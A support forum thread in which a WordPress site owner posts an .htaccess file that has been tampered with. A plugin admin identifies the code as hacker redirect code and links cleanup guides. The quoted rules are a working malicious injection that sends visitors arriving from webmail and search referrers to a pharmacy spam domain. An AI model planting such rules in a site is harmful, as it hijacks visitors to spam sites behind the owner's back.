hacker redirect htaccess code

[Living In Puglia]

I am very confused … when I look at Current Root htaccess file in the Bulletproof control panel all looks good … starts

#   BULLETPROOF .49.8 >>>>>>> SECURE .HTACCESS
# If you edit the BULLETPROOF .49.8 >>>>>>> SECURE .HTACCESS text above
# you will see error messages on the BPS Security Status page
# BPS is reading the version number in the htaccess file to validate checks
# If you would like to change what is displayed above you
# will need to edit the BPS /includes/functions.php file to match your changes
# If you update your WordPress Permalinks the code between BEGIN WordPress and
# END WordPress is replaced by WP htaccess code.
# This removes all of the BPS security code and replaces it with just the default WP htaccess code
# To restore this file use BPS Restore or activate BulletProof Mode for your Root folder again.

# BEGIN WordPress
# IMPORTANT!!! DO NOT DELETE!!! - B E G I N WordPress above or E N D WordPress - text in this file
# They are reference points for WP, BPS and other plugins to write to this htaccess file.
# IMPORTANT!!! DO NOT DELETE!!! - BPSQSE BPS QUERY STRING EXPLOITS - text
# BPS needs to find the - BPSQSE - text string in this file to validate that your security filters exist

# TURN OFF YOUR SERVER SIGNATURE
ServerSignature Off

***************************************

But when I look at the actual .htaccess file I have
ErrorDocument 404 http://buyrxcheap24.com/

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*imap.* [OR]
RewriteCond %{HTTP_REFERER} .*mail* [OR]
RewriteCond %{HTTP_REFERER} .*inbox* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*hotmail.* [OR]
RewriteCond %{HTTP_REFERER} .*gmail.* [OR]
RewriteCond %{HTTP_REFERER} .*gmx.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://buyrxcheap24.com/ [R=301,L]

*************************************

I have tried recreating the htaccess files but get the same result! Totally Confused now

[AITpro Admin]

That htaccess code is not BPS code and is hacker redirect code added by something/someone else.  Your website is already compromised/hacked.  See this Forum Topic link below for what to do next and also the link for the WordPress.org thread post.

Website already hacked before installing BPS/BPS Pro
http://forum.ait-pro.com/forums/topic/website-is-already-hacked-will-bps-pro-automatically-fix-or-remove-the-hackers-files-and-code/

Similar/same hacking method
http://wordpress.org/support/topic/htaccess-hacked-redirects-to-russion-site?replies=30

[Living In Puglia]

Thank you. I’ve been working through the sites and pretty much got back to normal I think. I’m on a shared server with a number of different domains/web sites, some on Joomla and some on WordPress. It’s pretty much looking like the original hack came into one of the Joomla sites!

[AITpro Admin]

We just posted this step by step WordPress hack cleanup/repair Topic since we receive emails very frequently from folks wanting to know if BPS will automatically cleanup a hacked website.  This post/topic was on our “to-do” list so it is now “to-done”.  😉  I think the general idea of the cleanup/repair steps will also work in general for Joomla or other site types.  Obviously there are going to be technical/specific things that are not going to be the same between WordPress and Joomla, but the general approach is probably the best approach to take for website hack cleanup/repair.

http://forum.ait-pro.com/forums/topic/wordpress-hacked-wordpress-hack-cleanup-wordpress-hack-repair/

 

[Living In Puglia]

Thanks …. very helpful

 

[Author]

Posts